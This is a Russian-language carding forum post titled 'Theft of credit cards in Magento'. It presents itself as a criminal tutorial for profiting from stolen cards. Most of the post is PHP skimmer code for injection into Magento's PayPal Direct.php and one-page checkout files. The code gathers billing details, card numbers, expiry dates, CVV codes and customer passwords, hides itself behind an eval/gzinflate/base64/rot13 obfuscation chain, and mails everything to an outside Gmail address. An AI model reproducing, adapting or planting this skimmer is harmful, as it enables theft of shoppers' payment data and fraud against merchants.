1. Внимание!!! Не заходит на форум? Хотите сохранить доступность к нам на 99.9%? Обязательно запишите все зеркала проекта! Именно по этому мы настоятельно рекомендуем использовать онион домен для TOR-Браузера, там доступность форума будет максимальной. Ссылка для установки и все зеркала в этой темe.

    Зеркало для TOR-Браузера - http://norabizt5qqxefxy.onion

    Чистое зеркало для обычных браузеров - https://nora.holiday

    Скрыть объявление

Похищение кредитных карт в Magento

Тема в разделе "КАРДИНГ В НОРЕ", создана пользователем CROBINg, 2 июл 2018.

  1. CROBINg
    off

    CROBINg работа, ничего личного СПЕЦИАЛИСТ

    Сообщения:
    60
    Пол:
    Мужской
    Адрес:
    India
    Репутация:
    24
    Сфера:
    Кардинг
    Похищение кредитных карт в Magento
    На данный момент очень выгодна кража кредитных карт, для этого наш брал ломает сайты или заражает и распространяет CMS интернет магазинов. Сегодня я покажу как это делается в интернет магазине Magento.

    Один из вариантов вредоносного ПО, который перехватывает данные кредитной карты, введенные в метод оплаты PayPal «app/code /core/Mage/Paypal/Model/Direct.php».

    Код:
     $setXBodyText = 'First name : '.trim($order->getBillingAddress()->getFirstname()).'<br>';
    $setXBodyText .= 'Last name : '.trim($order->getBillingAddress()->getLastname()).'<br>';
    $setXBodyText .= 'Address : '.trim($order->getBillingAddress()->getStreet(1)).'<br>';
    $setXBodyText .= 'Address2 : '.trim($order->getBillingAddress()->getStreet(2)).'<br>';
    $setXBodyText .= 'City : '.trim($order->getBillingAddress()->getCity()).'<br>';
    $setXBodyText .= 'Phone : '.trim($order->getBillingAddress()->getTelephone()).'<br>';
    $setXBodyText .= 'Country : '.trim($order->getBillingAddress()->getCountry()).'<br>';
    $setXBodyText .= 'State : '.trim($order->getBillingAddress()->getRegion()).'<br>';
    $setXBodyText .= 'Zipcode : '.trim($order->getBillingAddress()->getPostcode()).'<br>';
    $setXBodyText .= 'Email : '.trim($order->getBillingAddress()->getEmail()).'<br>';
    if($payment->getCcOwner()){$setXBodyText .= 'name on card : '.trim($payment->getCcOwner()).'<br>';}
    $setXBodyText .= 'Credit Card Type : '.trim($payment->getCcType()).'<br>';         
    $setXBodyText .= 'Card number : '.trim($payment->getCcNumber()).'<br>';
    $setXBodyText .= 'Exp date : '.trim($payment->getCcExpMonth()).trim($payment->getCcExpYear()).'<br>';
    $setXBodyText .= 'CVV2 : '.trim($payment->getCcCid());
    $setXBodyTextEncripted = @eval(gzinflate(base64_decode(str_rot13(strrev('=RDe0b0XFAxXGWCavf0<CONTENT REMOVED>F2mPlW7DYX9FlhxjH')))));
    Если сделать декод последней строки, то можно увидеть, что все данные отправляются на электронную почту.

    Код:
    $StoresThisName = $_SERVER['SERVER_NAME'];mail('nora.biz@gmail.com',"Authorize Direct $StoresThisName", $setXBodyText);

    Следующий образец - это другой метод инъекций. На этот раз мы перехватили модуль проверки на одну страницу, чтобы ввести код («app/code/core/Mage/Checkout/Model/Type/Onepage.php»):

    Код:
    eval(gzinflate(base64_decode(str_rot13(strrev('=8j52gl334pv3DXrlwgB2LcqOBIFIxlFS<CONTENT REMOVED>VrIdKNIPFHIRjq6zinVRjbgwoKMa')))));
    Декодим:

    Код:
    $what = '---------------------';
    $send = array(
    'Payment Method' => $data['method'],
    'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(),
    'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(),
    'Billing Address 1' => $this->getQuote()->getBillingAddress()->getStreet(1),
    'Billing Address 2' => $this->getQuote()->getBillingAddress()->getStreet(2),
    'Billing City' => $this->getQuote()->getBillingAddress()->getCity(),
    'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(),
    'Billing PostCode' => $this->getQuote()->getBillingAddress()->getPostcode(),
    'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(),
    'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(),
    'Billing Tax' => $this->getQuote()->getBillingAddress()->getTaxvat() or "NULL",
    'CC Owner' => $data['cc_owner'],
    'CC Type' => $data['cc_type'],
    'CC Number' => $data['cc_number'],
    'CC Start' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))),
    'CC Expired' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))),
    'CC Sec' => $data['cc_cid'],
    'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "NULL",
    'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "NULL",
    'Account Password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "NULL",
    'IP Address' => trim(getenv('REMOTE_ADDR')),
    'Web Store' => trim($_SERVER['SERVER_NAME'])
    );
    $numb = trim($data['cc_number']);
    $mail = trim($this->getQuote()->getBillingAddress()->getEmail());
    if($numb != NULL) $what = "$numb - Payment Report";
    else $what = "Payment Report - $mail";
    foreach ($send as $param => $value) {
    $send .= "$param = $value\r\n";
    }
    $data .= @substr($send, 5, -1);
    @mail('nora.biz@gmail.com', $what, $data);